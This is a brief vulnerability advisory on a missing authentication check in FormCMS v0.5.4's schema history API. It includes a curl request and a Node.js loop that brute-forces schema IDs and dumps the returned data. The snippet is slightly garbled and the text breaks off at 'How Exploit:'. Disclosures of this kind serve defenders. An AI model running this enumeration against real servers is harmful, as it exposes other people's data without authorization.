FormCMS, Improper Access Control, CVE-2025-XXXXX (Moderate)

Listen to this Post

The CVE-2025-XXXXX vulnerability in FormCMS v0.5.4 stems from a missing authentication check on the `/api/schemas/history/

` API endpoint. This endpoint is designed to retrieve the version history of a form schema. The application fails to verify if the incoming request is from an authenticated and authorized user before processing it. An unauthenticated attacker can exploit this flaw by crafting a simple HTTP GET request and appending a valid schema identifier to the URL. The system does not validate the user's session or role, proceeding directly to fetch and return the sensitive historical data for any schemaId provided. This allows for the enumeration and exfiltration of all form schema revision histories, including potentially sensitive field definitions and configuration data, simply by guessing or discovering valid schema IDs through other means.
Platform: FormCMS
Version: v0.5.4
Vulnerability: Improper Access Control

[bash]
curl -X GET http://<target>/api/schemas/history/123
// Simple script to brute-force schemaId values
const fetch = require('node-fetch');
const baseUrl = 'http://target.com/api/schemas/history/';
for (let id = 1; id < 1000; id++) {
fetch(baseUrl + id)
.then(response => response.json())
.then(data => console.log(<code>ID ${id}:</code>, data))
.catch(err => {});
}

How Exploit:
